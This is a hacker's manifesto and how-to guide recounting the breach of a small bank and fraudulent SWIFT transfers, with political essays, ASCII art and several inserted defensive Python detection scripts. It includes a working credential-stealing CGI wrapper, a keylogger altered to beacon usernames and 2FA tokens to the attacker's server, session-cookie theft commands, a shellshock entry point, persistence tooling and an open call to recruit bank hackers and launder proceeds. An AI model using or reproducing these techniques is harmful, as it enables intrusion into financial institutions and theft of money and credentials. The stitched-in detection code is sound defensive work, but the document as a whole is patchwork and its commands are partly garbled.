| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
A DIY guide to robbing banks
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
By Subcowmandante Marcos
I am a wild child
Innocent, free, wild
I am all ages
My grandparents live in me
I am a brother of the clouds
And I only know how to share
I know that everything belongs to everyone
that everything is alive in me
My heart is a star
I am a child of the earth
I travel aboard my spirit
On the way to eternity
This is my simple word that seeks to touch the hearts of simple and
humble people, but also dignified and rebellious ones. This is my simple word
to tell of my hacks, and to invite other people to hack with cheerful
I hacked a bank. I did it to give a liquidity injection, but this time from
below and to the simple and humble people who resist and rebel against
injustices worldwide. In other words: I robbed a bank and gave away the
money. But it wasn't me alone who did it. The free software movement, the
offensive powershell community, the metasploit project and the hacker
community in general are the ones that enabled this hack. The community
made it possible to convert intrusion into a bank's computers into cash
and bitcoin. The Tor, Qubes and Whonix projects, together with the
cryptographers and activists who defend privacy and anonymity, are my
nahuales, that is to say, my protectors [1]. They accompany me every night
and make it possible for me to stay in
I did nothing complicated. I only saw the injustice in this world, felt love
for all beings, and expressed that love in the best way I could, through the
tools that I know how to use. It is not hate for banks or for the rich that
moves me, but a love for life, and the desire for a world where everyone can
realize their potential and live a full life. I would like to explain a
little how I see the world, so you can get an idea of how I came to feel and
act like this. I also hope that this guide is a recipe that you can follow,
combining the same ingredients to bake the same cake. Who knows, perhaps
such powerful tools will end up also serving you to express the
love you feel.
We are all wild children
innocent, free, wild
We are all brothers of the trees
children of the earth
We only have to place in our hearts
a burning star
(song by Alberto Kuselman and Chamalú)
The police will invest a chingo of resources in investigating me. They think
the system works, or at least that it will work once they catch all the
"bad boys". I am nothing more than the product of a system that does not work.
As long as there is injustice, exploitation, alienation, violence and
ecological destruction, many more like me will come: an endless series of
people who will reject as illegitimate the bad system responsible for this
suffering. That badly made system is not going to be fixed by arresting me.
I am only one of the millions of seeds that Tupac planted 238 years ago in La
Paz [2], and I hope that my actions and writings water the seed of rebellion
in your hearts.
[2] It was before he was killed by the Spaniards, on a day just like
yesterday, that he said "they will only kill me, but tomorrow I will return
and I will be millions."
< So that they would see us, we covered our faces >
\ ^__^
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
To make ourselves heard, we hackers sometimes have to cover our faces, because
we are not interested in having our faces seen but in having our word
understood. The mask can be that of Guy Fawkes, of Salvador Dalí, of
Fsociety, or in some cases the puppet of a crested toad. By affinity, this
time I went to dig up a dead man to lend me his balaclava. I think I should
then clarify that Sup Marcos is innocent of everything that is told here
because, besides being dead, I didn't consult him. I hope his ghost, if he
finds out from a Chiapanecan hammock, knows how to find the goodness to, as
they say there, "dismiss this deep fake" with the same gesture with which one
waves away an inopportune insect, which could well be a beetle.
Even with the balaclava and the name change, many of those who support my
actions are perhaps going to pay too much attention to my person. With their
own autonomy shattered by a lifetime of domination, they will be looking for a
leader to follow, or a hero to save them. But behind the balaclava
I am only a girl. We are all wild children. We just have to place a star
in flames in our hearts.
- [1 - Why expropriate] ------------------------------------------------------
Capitalism is a system in which a minority has come to appropriate
the vast majority of the world's resources through war, theft and
exploitation. By snatching the commons [1], they forced those below to
be under the control of that minority that owns everything. It is a system
fundamentally incompatible with freedom, equality, democracy and
Suma Qamaña (Good Living). It may sound ridiculous to those of us who have
grown up in a propaganda machine that taught us that capitalism is freedom,
but in truth what I say is not a new or controversial idea [2]. The founders
of the United States of America knew they had to choose between creating a
capitalist society, or a free and democratic one. Madison recognized that "the
man who possesses wealth, he who lies on his couch or rolls in his carriage,
cannot judge the wishes or feelings of the day laborer." But to protect
against the "spirit of equalization" of the landless day laborers, it seemed
to him that only landowners should vote, and that the government had to
serve to "protect the opulent minority against the great majority." John
Jay was more to the point and said: "Those who own the country should
rule it."
/ There is no such thing as green capitalism.      \
| Let's make capitalism history before it makes us |
\ history.                                         /
\ /\ ___ /\
\ // \/ \/ \\
(( O O ))
\\ / \ //
\/ | | \/
| | | | Evgeny, the great ignored elephant, doesn't understand why everyone
| | | | pretends not to see him on the panels about climate change, so
| o | here I give him a chance to say his lines.
| | | |
|m| |m|
In the same way that bell hooks [3] argues that the rejection of the
patriarchal culture of domination is an act in defense of men's own interest
(since it emotionally mutilates them and prevents them from feeling love and
connection fully), I believe that the culture of domination of capitalism has
a similar effect on the rich, and that they could have fuller and more
satisfying lives if they rejected the class system from which they believe
they benefit. For many, class privilege amounts to a childhood of emotional
neglect, followed by a life of superficial social interactions and
meaningless work. It may be that deep down they know that they can only
genuinely connect with people when they work with them as their peers, and
not when they put them at their service. They may know that sharing their
material wealth is the best they can do with it. They may also know that the
meaningful experiences, connections and relationships that count are not the
ones that come from mercantile interactions, but precisely from rejecting the
logic of the market and giving without expecting anything in return. They may
know that all they need to escape from their prison and really live is to let
go, give up control, and take a leap of faith. But most lack the courage.
So it would be naive of us to direct our efforts at trying to
produce some kind of spiritual awakening in the rich [4]. As Assata
Shakur says: "No one in the world, no one in history, has ever achieved his
freedom by appealing to the moral sense of its oppressors." Actually, when
rich people distribute their money, they almost always do it in a way that
reinforces the system that allowed them to amass their enormous and
illegitimate wealth in the first place [5]. And change is unlikely to come
through a political process; as Lucy Parsons says: "Let us never be fooled
that the rich are going to let us vote to take away their wealth." Colin
Jenkins justifies expropriation with these words [6]:
Make no mistake, expropriation is not theft. It is not the confiscation of
money earned "by the sweat of the brow." It is not theft of private
property. It is, rather, the recovery of huge amounts of land and
wealth that have been forged with stolen natural resources, human
slavery, and forced labor, and amassed over hundreds of years by a
small minority. This wealth ... is illegitimate, both for moral purposes and
for the exploitation mechanisms that have been used to create it.
For Colin, the first step is that "we have to free ourselves from our mental
bonds (believing that wealth and private property have been earned by
those who monopolize them; and that, therefore, they should be something to
respect, revere, and even something to pursue), open our minds, study and
learn from history, and recognize this illegitimacy together." Here I leave
you some books that have helped me with this [7] [8] [9] [10] [11].
According to Barack Obama, economic inequality is "the challenge that defines
our time." Computer hacking is a powerful tool to combat
economic inequality. The former director of the NSA, Keith Alexander, agrees
and says that hacking is responsible for "the greatest transfer of wealth of the
/ History is ours          \
\ and hackers make it!     /
\ ^__^
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
Allende present, now and always!
[3] The Will to Change: Men, Masculinity, and Love
[4] his own religion is already very clear about it:
[7] Manifesto for a Democratic Civilization. Volume 1, Civilization: The Era
of the Masked Gods and the Covered Kings
[8] Caliban and the Witch
[9] In debt: An alternative history of the economy
[10] The other story of the United States
[11] The open veins of Latin America
< Our weapon is our keyboard >
\ ^__^
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
`' ^^ ^^
- [2 - Introduction] ---------------------------------------------------------
This guide explains how I hacked the Cayman Bank and Trust Company
(Isle of Man). Why am I publishing this, almost four years later?
1) To show what is possible
Hackers working for social change have limited themselves to developing
security and privacy tools, DDoS, defacements and leaks.
Wherever you go there are radical projects for complete social change in a
state of precariousness, and they could do a lot with some expropriated
money. At least for the working class, bank robbery is something
socially accepted, and those who do it are seen as heroes of the people. In
the digital age, robbing a bank is a non-violent, less risky act, and the
reward is greater than ever. So why is it only black hat hackers
who do it for their personal benefit, and never
hacktivists to finance radical projects? Maybe they don't think they are
able to do it. The big bank hacks come out in the news every
so often, like the hack of the Bank of Bangladesh [1], which was attributed
to North Korea, or the hacks of banks attributed to the Carbanak group [2],
which they describe as a very large and well organized group of Russian
hackers, with different members specialized in different tasks. And, well
it's not so
It is because of our collective belief that the financial system is
unquestionable that we exercise control over ourselves, and maintain the
class system without those above having to do anything [3]. Being able to see
how vulnerable and fragile the financial system actually is helps us break
that collective hallucination. That is why banks have a strong incentive not
to report hacks, and to exaggerate how sophisticated the attackers are. None
of the financial hacks that I did, or that I have known of, has ever been
reported. This is going to be the first, and not because the bank wanted to,
but because I decided to publish it.
As you are about to learn in this homemade guide, hacking a bank and
transferring money through the SWIFT network does not require the support of
any government, nor of a large and specialized group. It is something totally
possible for a mere run-of-the-mill amateur hacker, with just public tools
and basic knowledge of how to write a script.
2) Help withdraw cash
Many of those who read this already have, or with a little study are going to
be able to acquire, the skills necessary to carry out a hack
like this. However, many will find that they lack the
criminal connections necessary to get the handles in condition. In my
case, this was the first bank that I hacked, and at that time I only had a
few mediocre accounts prepared to withdraw cash (known
as bank drops), so it was only a few hundred thousand that
I was able to withdraw in total, when it is normal to get millions. Now, on
the other hand, I do have the knowledge and connections to get cash more
seriously, so if you are hacking a bank but need help to convert
that into real money, and you want to use that wool to finance radical social
projects, contact me.
3) Collaborate
It is possible to hack banks as an amateur who works alone, but it
is clear that, in general, it is not as easy as I paint it here. I was lucky
with this bank for several reasons:
1) It was a small bank, so it took me much less time to get to
understand how everything worked.
2) They had no procedure to check the sent swift messages.
Many banks have one, and you need to write code to hide your
transfers from their monitoring system.
3) They only used password authentication to access the application with
which they connected to the SWIFT network. Most banks now use RSA
SecurID, or some form of 2FA. You can skip this by writing code to
receive an alert when they enter their token, and thus be able to use it
before it expires. It's simpler than it seems: I've used Get-Keystrokes [1],
modifying it so that instead of storing the pressed keys, a
GET request is made to my server every time it is detected that they have
entered a username. This request adds the username to the url and,
as they type the token, several GETs are made with the token digits
concatenated to the url. On my side I leave this running in the meantime:
ssh yo @ my_secret_server 'tail -f / var / log / apache2 / access_log'
| while read i; I miss $ i; aplay alarm.wav &> / dev / null; done
If it is a web application, you can skip the 2FA by stealing the cookie
after they have authenticated. I am not an APT with a team of coders
that can make me custom tools. I am a simple person who lives
off what the terminal [2] gives, so what I use is:
procdump64 / accepteula -r -ma PID_del_browser
strings64 / accepteula * .dmp | findstr PHPSESSID 2> nul
or going through findstr rather than strings, which makes it much more
findstr PHPSESSID * .dmp> tmp
strings64 / accepteula tmp | findstr PHPSESSID 2> nul
Another way to skip it is to access their session with a hidden VNC (hvnc)
after they have authenticated, or with a little creativity
you could also focus on another part of their process instead of sending
SWIFT messages directly.
I think that if I collaborated with other experienced bank hackers we could
hack hundreds of banks like Carnabak, instead of doing one every so
often on my own. So if you have experience with similar hacks and
you want to collaborate, contact me. You will find my email and my PGP key at
the end of the previous guide [3].
Exfiltration / Get-Keystrokes.ps1
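
A detection for the token-capture channel described in point 3 above, added here as an example (it is not code from the original guide). It assumes egress or proxy log records of the form (timestamp, client, destination host, URL path); the record layout, host names and values are constructed. It flags a workstation whose requests to one host grow by a character or two at a time, and takes an allowlist because type-ahead search produces the same shape.

```python
from collections import defaultdict

# Constructed sample records: (epoch seconds, client IP, destination host, path).
SAMPLE_PROXY_LOG = [
    (1000.0, "10.0.5.23", "intranet.example.com", "/portal/home"),
    (1001.0, "10.0.5.23", "search.example.com", "/suggest?q=s"),
    (1001.4, "10.0.5.23", "search.example.com", "/suggest?q=sw"),
    (1001.9, "10.0.5.23", "search.example.com", "/suggest?q=swi"),
    (1002.3, "10.0.5.23", "search.example.com", "/suggest?q=swif"),
    (1020.0, "10.0.5.23", "static-assets.example.net", "/p/jdoe"),
    (1026.0, "10.0.5.23", "static-assets.example.net", "/p/jdoe4"),
    (1026.4, "10.0.5.23", "static-assets.example.net", "/p/jdoe48"),
    (1026.9, "10.0.5.23", "static-assets.example.net", "/p/jdoe481"),
    (1027.3, "10.0.5.23", "static-assets.example.net", "/p/jdoe4815"),
    (1027.8, "10.0.5.23", "static-assets.example.net", "/p/jdoe48151"),
    (1028.1, "10.0.5.23", "static-assets.example.net", "/p/jdoe481516"),
    (1040.0, "10.0.5.40", "static-assets.example.net", "/p/logo.png"),
]


def find_growing_urls(records, min_run=4, max_gap=30.0, max_step=2,
                      allow_hosts=()):
    """Flag (client, host) pairs whose successive paths each extend the
    previous one by 1..max_step characters within max_gap seconds."""
    by_pair = defaultdict(list)
    for ts, client, host, path in records:
        if host not in allow_hosts:
            by_pair[(client, host)].append((ts, path))

    alerts = []

    def close(client, host, run):
        # Report counts and times only; the typed characters are secrets
        # and are deliberately not copied into the alert.
        if len(run) >= min_run:
            alerts.append({
                "client": client,
                "host": host,
                "requests": len(run),
                "first_seen": run[0][0],
                "last_seen": run[-1][0],
                "chars_added": len(run[-1][1]) - len(run[0][1]),
            })

    for (client, host), reqs in sorted(by_pair.items()):
        reqs.sort()
        run = [reqs[0]]
        for prev, cur in zip(reqs, reqs[1:]):
            step = len(cur[1]) - len(prev[1])
            if (cur[1].startswith(prev[1]) and 0 < step <= max_step
                    and cur[0] - prev[0] <= max_gap):
                run.append(cur)
            else:
                close(client, host, run)
                run = [cur]
        close(client, host, run)
    return alerts


if __name__ == "__main__":
    for alert in find_growing_urls(SAMPLE_PROXY_LOG,
                                   allow_hosts={"search.example.com"}):
        print(alert)
```
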
/ If robbing a bank changed things, \
\ they'd make it illegal            /
\ ^__^
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
- [3 - Be careful out there] -------------------------------------------------
It is important to take some simple precautions. I'm going to refer to this
same section of my last guide [1], since apparently it works just fine
[2]. All I have to add is that, in Trump's words, "Unless you
catch hackers in flagrante, it is difficult to determine who it was that
was doing the hacking," so the police are getting more and more
creative [3] [4] in their attempts to grab criminals on the spot (when
their encrypted hard drives are unlocked). So it would be nice if, for
example, you carried a certain bluetooth device and configured your
computer to shut down when it moves beyond a certain range, or
when an accelerometer detects movement, or something like that.
Writing long articles detailing your actions and your ideology may not be
the safest thing in the world (oops!), but at times I feel I have to
do it.
If I did not believe in those who listen to me
If I did not believe in what hurts
If I did not believe in what remains
If I did not believe in what struggles
What would it be...
What would the mallet be without the quarry?
|f-"Y\ ____________________
\()7L/ | Be gay! |
cgD | Do crime! | __ _
|\( --------------------- .' Y '>,
\ \ \ / _ _ \
\\\ \ )(_) (_)(|}
\\\ { 4A } /
\\\ \uLuJJ/\l
\\\ |3 p)/
\\\___ __________ /nnm_n//
c7___-__,__-)\,__)(". \_>-<_/D
//V \_"-._.__G G_c__.-__<"/ ( \
<"-._>__-,G_.___)\ \7\
("-.__.| \"<.__.-" ) \ \
|"-.__"\ |"-.__.-".\ \ \
("-.__"". \"-.__.-".| \_\
\"-.__""|!|"-.__.-".) \ \
"-.__""\_|"-.__.-"./ \ l
".__""">G>-.__.-"> .--,_
"" G
Many blame queer people for the decline of this society;
we are proud of it
Some believe that we want to reduce to ashes
this civilization and its moral fabric;
They couldn't be more right
They often describe us as depraved, decadent and unruly
But alas! They haven't seen anything yet
- [4 - Get access] -----------------------------------------------------------
Elsewhere [1] I talked about the main ways to get
initial access to a company's network during a targeted attack. However,
this was not a targeted attack. I didn't set out to hack a specific bank; what
I wanted was to hack any bank, which ends up being a much simpler
task. This type of nonspecific approach was popularized by Lulzsec and
Anonymous [2]. As part of [1], I prepared an exploit and post-exploitation
tools for a popular VPN device. Then I started scanning the
entire internet with zmap [3] and zgrab to identify other vulnerable
devices. I had the scanner save the vulnerable IPs, along with the
"common name" and "alt names" of the device's SSL certificate, the Windows
domain names of the device, and the reverse DNS lookup of the IP. I
did a grep of the result in search of the word "bank", and there was plenty to
choose from, but the truth is that the word "Cayman" attracted me, and that is
how I came to stay with this one.
- [4.1 - The Exploit] --------------------------------------------------------
When I published my latest DIY guide [1] I didn't reveal the details of the
sonicwall exploit that I had used to hack Hacking Team, since it was very
useful for other hacks, like this one, and I still hadn't finished having fun
with it. Determined then to hack Hacking Team, I spent weeks reverse
engineering their sonicwall ssl-vpn model, and I even managed to find
several memory corruption vulnerabilities, more or less difficult to
exploit, before I realized that the device was easily exploitable
with shellshock [2]. When shellshock came out, many sonicwall devices were
vulnerable, with just a request to cgi-bin/welcome, and a payload in the
user-agent. Dell released a security update and an advisory for these
versions. The version used by Hacking Team and this bank had the vulnerable
version of bash, but cgi requests didn't trigger shellshock except for
requests to a shell script, and there was just one accessible:
cgi-bin / This seems to have escaped Dell in their note,
since they never released a security update or an advisory for that
sonicwall version. And, kindly, Dell had made twounix setuid root,
leaving the device easy to root.
In my last guide many read that I spent weeks researching a device
until I found an exploit, and they assumed that meant that I was some kind
of elite hacker. The reality, that is, the fact that it took me two weeks
to realize that it was trivially exploitable with shellshock, is maybe less
flattering to me, but I think it's also more inspiring. It shows that
you really can do this yourself. You don't need to be a genius; I
certainly am not. Actually my work against Hacking Team started a
year before. When I discovered Hacking Team and the Gamma Group in the
CitizenLab research [3] [4], I decided to explore a bit and see if I could
find something. I didn't get anywhere with Hacking Team, but I was lucky with
Gamma Group, and I was able to hack their customer support portal with basic
sql injection and file upload vulnerabilities [5] [6]. However, although
their support server gave me a pivot into the internal Gamma Group
network, I was unable to penetrate further into the company. From this
experience with the Gamma Group and other hacks, I realized that I was
really limited by my lack of knowledge about privilege escalation and
lateral movement in windows domains, active directory and windows in general.
So I studied and practiced (see section 11), until I felt I was ready
to pay Hacking Team another visit almost a year later. The practice
paid off, and this time I was able to make a complete compromise of the
company [7]. Before I realized that I could get in with shellshock, I was
willing to happily spend whole months of my life studying exploit
development and writing a reliable exploit for one of the memory
corruption vulnerabilities I had found. I just knew that Hacking Team
needed to be exposed, and that I would take as much time as necessary and
learn what I had to learn to achieve it. To perform these
hacks you don't need to be brilliant. You don't even need great technical
knowledge. You just need dedication, and to believe in yourself.
bahrain-track-arab-spring-protesters /
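
The shellshock requests described in this section leave a recognisable mark in web server logs. The following is an added example, not code from the original guide: it parses combined-format access log lines and flags any request whose user-agent, referer or URL-decoded request line contains a bash function definition. The log lines are constructed, and /cgi-bin/status.sh is a made-up name standing in for a CGI shell script.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" format:
# host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)

# Shellshock needs an environment value that bash parses as a function
# definition, so the tell-tale is "() {" (the whitespace may vary).
FUNC_DEF_RE = re.compile(r"\(\)\s*\{")

# Constructed sample lines: documentation addresses, harmless echo payload.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2014:13:55:36 +0000] "GET /index.html HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [10/Oct/2014:13:56:01 +0000] "GET /cgi-bin/welcome HTTP/1.1" '
    '200 312 "-" "() { :; }; echo constructed-probe"',
    '203.0.113.9 - - [10/Oct/2014:13:56:05 +0000] "GET /cgi-bin/status.sh HTTP/1.1" '
    '500 0 "() { x; }; echo constructed-probe" "curl/7.38.0"',
    '198.51.100.7 - - [10/Oct/2014:13:57:12 +0000] "GET /docs/func() HTTP/1.1" '
    '404 210 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2014:13:58:40 +0000] '
    '"GET /cgi-bin/welcome?x=%28%29%20%7B%20%3A%3B%20%7D HTTP/1.1" '
    '200 312 "-" "curl/7.38.0"',
]


def find_shellshock(lines):
    """Return one finding per log line that carries a function definition
    in a field the web server hands to CGI programs as an environment value."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = m.group("request").split()
        path = parts[1] if len(parts) >= 2 else ""
        values = {
            "request": unquote(m.group("request")),  # catches %28%29%20%7B
            "referer": m.group("referer"),
            "agent": m.group("agent"),
        }
        hit_fields = [name for name, value in values.items()
                      if FUNC_DEF_RE.search(value)]
        if hit_fields:
            findings.append({
                "line": lineno,
                "host": m.group("host"),
                "path": path,
                "fields": hit_fields,
                # Only CGI handlers that reach bash are exposed, so a hit
                # on a cgi-bin path deserves attention first.
                "cgi": path.startswith("/cgi-bin/"),
                "status": int(m.group("status")),
            })
    return findings


if __name__ == "__main__":
    for finding in find_shellshock(SAMPLE_LOG):
        print(finding)
```
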
- [4.2 - The Backdoor] -------------------------------------------------------
Part of the backdoor that I prepared for Hacking Team (see [1], section 6) was
a simple wrapper on the login page to capture passwords:
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <stdlib.h>
int main ()
char buf [2048];
int nread, pfile;
/ * pull the log if we send a special cookie * /
char * cookies = getenv ("HTTP_COOKIE");
if (cookies && strstr (cookies, "our private password")) {
write (1, "Content-type: text / plain \ n \ n", 26);
pfile = open ("/ tmp / .pfile", O_RDONLY);
while ((nread = read (pfile, buf, sizeof (buf)))> 0)
write (1, buf, nread);
exit (0);
/ * the principal stores the POST data and sends it to the child,
what is the real login program * /
int fd [2];
pipe (fd);
pfile = open ("/ tmp / .pfile", O_APPEND | O_CREAT | O_WRONLY, 0600);
if (fork ()) {
close (fd [0]);
while ((nread = read (0, buf, sizeof (buf)))> 0) {
write (fd [1], buf, nread);
write (pfile, buf, nread);
write (pfile, "\ n", 1);
close (fd [1]);
close (pfile);
wait (NULL);
} else {
close (fd [1]);
dup2 (fd [0], 0);
close (fd [0]);
execl ("/ usr / src / EasyAccess / www / cgi-bin / .userLogin",
"userLogin", NULL);
In the case of Hacking Team, they logged into the VPN with single-use
passwords, so the VPN gave me access only to the network, and from there it
took an extra effort to get domain admin on their network. In the other guide
I wrote on lateral passes and privilege escalation in windows domains [1]. In
this case, however, it was the same windows domain passwords that were
used to authenticate against the VPN, so I could get a good number of
user passwords, including the domain admin's. Now I had total
access to their network, but usually this is the easy part. The most
complicated part is to understand how they operate and how to get the gun.
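
The wrapper above takes the place of the login program and runs the original from a dot-prefixed name beside it, which is exactly what a file integrity check on the appliance's CGI directory catches. The following is an added example, not code from the original guide: it compares a directory against a known-good hash manifest and also reports hidden executables and setuid files. The manifest format and the temporary directory used in demo() are assumptions made for the illustration.

```python
import hashlib
import os
import stat
import tempfile


def sha256_file(path):
    """Hash a file in chunks so large binaries do not load into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def audit_cgi_dir(root, baseline):
    """Compare a CGI directory with a manifest {relative path: sha256}.

    Returns a sorted list of (relative path, reason) findings."""
    findings, seen = [], set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):
                continue
            rel = os.path.relpath(full, root)
            seen.add(rel)
            if name.startswith(".") and st.st_mode & 0o111:
                findings.append((rel, "hidden_executable"))
            if st.st_mode & stat.S_ISUID:
                findings.append((rel, "setuid"))
            if rel not in baseline:
                findings.append((rel, "not_in_baseline"))
            elif sha256_file(full) != baseline[rel]:
                findings.append((rel, "hash_mismatch"))
    findings += [(rel, "missing") for rel in set(baseline) - seen]
    return sorted(findings)


def demo():
    """Build a constructed one-file CGI directory, record its manifest,
    then reproduce the file layout the section describes and audit it."""
    with tempfile.TemporaryDirectory() as root:
        login = os.path.join(root, "userLogin")
        with open(login, "wb") as fh:
            fh.write(b"#!/bin/sh\necho vendor login program\n")
        os.chmod(login, 0o755)
        baseline = {"userLogin": sha256_file(login)}
        clean = audit_cgi_dir(root, baseline)

        # Same layout as in the text: the original sits under a dot name
        # and a different file answers at the original path.
        os.rename(login, os.path.join(root, ".userLogin"))
        with open(login, "wb") as fh:
            fh.write(b"#!/bin/sh\necho replaced file\n")
        os.chmod(login, 0o755)
        tampered = audit_cgi_dir(root, baseline)
    return clean, tampered


if __name__ == "__main__":
    clean, tampered = demo()
    print("clean:", clean)
    print("tampered:", tampered)
```

The manifest has to be taken from a trusted firmware image and kept off the device, since anything stored on a rooted appliance can be rewritten along with the files it describes.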
- [4.3 - Fun facts] ----------------------------------------------------------
Following the investigation they did into the hack, I found it interesting
to see that, around the same time I did it, the bank could have been
compromised by someone else through a targeted phishing email [1].
As the old saying goes, "give a person an exploit and they will have access
for a day, teach them to phish and they will have access all their life" [2].
The fact that someone else, by chance and at the same time as me, put this
small bank in their sights (they registered a domain similar to the real
domain of the bank to be able to send phishing from there) suggests that bank
hacks occur much more frequently than is known.
A fun suggestion so you can follow the investigation of your
hacks is to have a backup access, one that you won't touch unless you
lose your normal access. I have a simple script that waits for commands
once a day, or less, just to maintain long-term access in case
they block my regular access. Then I had a powershell empire [3]
calling home more frequently to a different IP, and used empire to
launch meterpreter [4] against a third IP, where I performed most of
my work. When PWC started investigating the hack, they found my use of
empire and meterpreter and cleaned those computers and blocked those IPs, but
they did not detect my backup access. PWC had placed network monitoring
devices, to be able to analyze the traffic and see if there were still
infected computers, so I didn't want to connect much to their network. I only
launched mimikatz once to get the new passwords, and from there
I was able to follow their investigation by reading their emails in outlook
web access.
[1] page 47, Project Pallid Nutmeg.pdf, in torrent
- [5 - Understand Banking Operations] ----------------------------------------
To understand how the bank operated, and how I could get money, I followed the
techniques that I summarized in [1], in section "13.3 - Internal Recognition".
I downloaded a list of all file names, did a grep in search
of words like "SWIFT" and "transfer", and downloaded and read all the
files with interesting names. I also looked through employees' emails, but
by far the most useful technique was to use keyloggers and screenshots to
observe how the bank employees worked. I didn't know it back then, but
windows comes with a very good monitoring tool for this [2]. As
described in technique no. 5 of section 13.3 in [1], I captured the
keys pressed throughout the domain (including window titles), did a
grep in search of SWIFT, and found some employees opening 'SWIFT Access
Service Bureau - Logon'. For those employees, I ran meterpreter as in [3], and
used the post/windows/gather/screen_spy module to take screenshots
every 5 seconds, to see how they worked. They were using a remote citrix
app from the company bottomline [4] to access the SWIFT network, where
each SWIFT MT103 payment message had to pass through three employees: one
to "create" the message, one to "verify" it, and another to "authorize" it. As
I already had all their credentials thanks to the keylogger, I could easily
perform the three steps myself. And from what I knew after watching them
work, they didn't check the sent SWIFT messages, so I should have
enough time to get the money out of my bank drops before the bank
realized and tried to reverse the transfers.
remotely-with-metasploit /
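
The three-person create, verify and authorize flow described above only checks that three different accounts took part, so it still passes when one operator holds all three sets of credentials. The following is an added example, not code from the original guide, of the review the bank lacked: it looks at who performed each step, from where, and how quickly. The audit record layout, user names, workstation names and the 60-second threshold are all constructed, and "src" is assumed to be the end user's own client address rather than a shared Citrix server.

```python
from collections import defaultdict
from datetime import datetime

STEPS = ("create", "verify", "authorize")

# Constructed audit records for four payment messages.
SAMPLE_AUDIT = [
    {"msg_id": "MSG-001", "step": "create", "user": "u.alvarez", "src": "ws-11", "ts": "2016-01-05T09:02:10"},
    {"msg_id": "MSG-001", "step": "verify", "user": "k.brown", "src": "ws-14", "ts": "2016-01-05T09:15:40"},
    {"msg_id": "MSG-001", "step": "authorize", "user": "m.chen", "src": "ws-17", "ts": "2016-01-05T09:31:05"},
    {"msg_id": "MSG-002", "step": "create", "user": "u.alvarez", "src": "ws-22", "ts": "2016-01-06T02:13:05"},
    {"msg_id": "MSG-002", "step": "verify", "user": "k.brown", "src": "ws-22", "ts": "2016-01-06T02:13:25"},
    {"msg_id": "MSG-002", "step": "authorize", "user": "m.chen", "src": "ws-22", "ts": "2016-01-06T02:13:50"},
    {"msg_id": "MSG-003", "step": "create", "user": "u.alvarez", "src": "ws-11", "ts": "2016-01-06T10:00:00"},
    {"msg_id": "MSG-003", "step": "verify", "user": "u.alvarez", "src": "ws-11", "ts": "2016-01-06T10:10:00"},
    {"msg_id": "MSG-003", "step": "authorize", "user": "m.chen", "src": "ws-17", "ts": "2016-01-06T10:20:00"},
    {"msg_id": "MSG-004", "step": "create", "user": "k.brown", "src": "ws-14", "ts": "2016-01-06T11:00:00"},
    {"msg_id": "MSG-004", "step": "authorize", "user": "m.chen", "src": "ws-17", "ts": "2016-01-06T11:10:00"},
]


def review_messages(events, min_handoff_seconds=60):
    """Return {msg_id: [reasons]} for messages whose approval chain does
    not look like three people working at three desks."""
    by_msg = defaultdict(list)
    for ev in events:
        by_msg[ev["msg_id"]].append(ev)

    report = {}
    for msg_id, evs in by_msg.items():
        evs.sort(key=lambda e: datetime.fromisoformat(e["ts"]))
        reasons = []

        # Every message needs exactly create -> verify -> authorize.
        if [e["step"] for e in evs] != list(STEPS):
            reasons.append("steps_missing_or_out_of_order")

        # Classic segregation of duties: one account, more than one step.
        users = [e["user"] for e in evs]
        if len(set(users)) < len(users):
            reasons.append("same_user_multiple_steps")

        # The case from the text: different accounts, one machine.
        sources = [e["src"] for e in evs]
        if len(set(sources)) < len(sources):
            reasons.append("shared_source_host")

        # People hand work over in minutes, not seconds.
        times = [datetime.fromisoformat(e["ts"]) for e in evs]
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if any(gap < min_handoff_seconds for gap in gaps):
            reasons.append("fast_handoff")

        if reasons:
            report[msg_id] = reasons
    return report


if __name__ == "__main__":
    for msg_id, reasons in sorted(review_messages(SAMPLE_AUDIT).items()):
        print(msg_id, reasons)
```
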
/ Whoever robs a thief gets a hundred years \
\ of pardon.                                /
\ ^__^
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
- [6 - Send money] -----------------------------------------------------------
I didn't have much idea what I was doing, so I was figuring it out
along the way. Somehow, the first transfers I sent went out
fine. The next day, I screwed up by sending a transfer to Mexico that put an
end to my fun. This bank sent its international transfers
through its correspondent account at Natwest. I had seen that the
correspondent account for transfers in pounds sterling (GBP) appeared as
NWBKGB2LGPL, while for the others it was NWBKGB2LXXX. The Mexican
transfer was in GBP, so I assumed I had to put NWBKGB2LGPL as
correspondent. If I had prepared better I would have known that the GPL
instead of XXX indicated that the payment would be sent through the Fast
Payment Service of the United Kingdom, rather than as an international
transfer, which obviously isn't going to work when you're trying to send
money to Mexico. So the bank received an error message. The same day I also
tried to send a payment of £200k to the UK using NWBKGB2LGPL, which was not
made because 200k exceeded the sending limit for fast payments, and I would
have had to use NWBKGB2LXXX instead. They also received an error message for
this. They read the messages, investigated, and found the rest of my
transfers.
- [7 - The loot] -------------------------------------------------------------
